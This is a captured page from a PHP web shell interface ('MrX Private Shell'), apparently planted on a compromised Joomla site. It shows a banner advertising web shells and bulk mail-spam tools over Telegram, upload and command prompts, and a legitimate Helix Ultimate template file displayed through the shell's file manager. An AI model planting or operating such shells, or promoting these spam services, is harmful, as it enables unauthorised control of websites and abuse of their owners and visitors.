__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * @package Helix_Ultimate_Framework
 * @author JoomShaper <[email protected]>
 * @copyright Copyright (c) 2010 - 2021 JoomShaper
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or Later
 */

defined('_JEXEC') or die();

use HelixUltimate\Framework\Platform\Settings;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Layout\LayoutHelper;

extract($displayData);

?>

<?php foreach ($groupData as $key => $data): ?>
	<?php if (\is_numeric($key)): ?>
		<?php echo LayoutHelper::render('cpanel.control-board.fieldset.field', ['field' => $data, 'group' => $group], HELIX_LAYOUTS_PATH); ?>
	<?php elseif (preg_match("#^subgroup-.+$#", $key)): ?>
		<?php
			$masterLabel = $data[0]->getAttribute('masterlabel');
			$masterLabel = isset($masterLabel) ? Text::_($masterLabel) : '';

			$masterDescription = $data[0]->getAttribute('masterdesc');
			$masterDescription = isset($masterDescription) ? Text::_($masterDescription) : '';

			$masterClass = $data[0]->getAttribute('masterclass');
			$masterClass = isset($masterClass) ? $masterClass : 'row hu-align-items-center';

			$masterHasSeparator = $data[0]->getAttribute('masterseparator');
			$masterHasSeparator = isset($masterHasSeparator) && ($masterHasSeparator === 'true' || $masterHasSeparator === 'on') ? ' hu-field-separator': '';
		?>
		<!-- if master label provider for the subgroup -->
		<?php if (!empty($masterLabel)): ?>
			<div class="control-group master-label-group">
				<div class="control-label">
					<label for=""><?php echo $masterLabel; ?></label>
					<?php if (!empty($masterDescription)): ?>
						<span class="hu-help-icon hu-ml-2 fas fa-info-circle"></span>
						<p class="hu-control-help"><?php echo $masterDescription; ?></p>
					<?php endif ?>
				</div>
			</div>
		<?php endif ?>

		<div class="hu-subgroup <?php echo $masterClass . $masterHasSeparator; ?>">
			<?php foreach ($data as $subgroup => $field): ?>
				<?php
					$classes =  $field->getAttribute('subclasses');
					$classes = isset($classes) ? $classes : 'col';
				?>
				<div class="<?php echo $classes; ?>">
					<?php echo LayoutHelper::render('cpanel.control-board.fieldset.field', ['field' => $field, 'group' => $group], HELIX_LAYOUTS_PATH); ?>
				</div>
			<?php endforeach ?>
		</div>
	<?php endif  ?>
<?php endforeach ?>

Filemanager

Name Type Size Permission Actions
field.php File 4.7 KB 0664
fields.php File 2.25 KB 0664
groups.php File 1.42 KB 0664
icon.php File 925 B 0664
panel.php File 1.87 KB 0664
Filemanager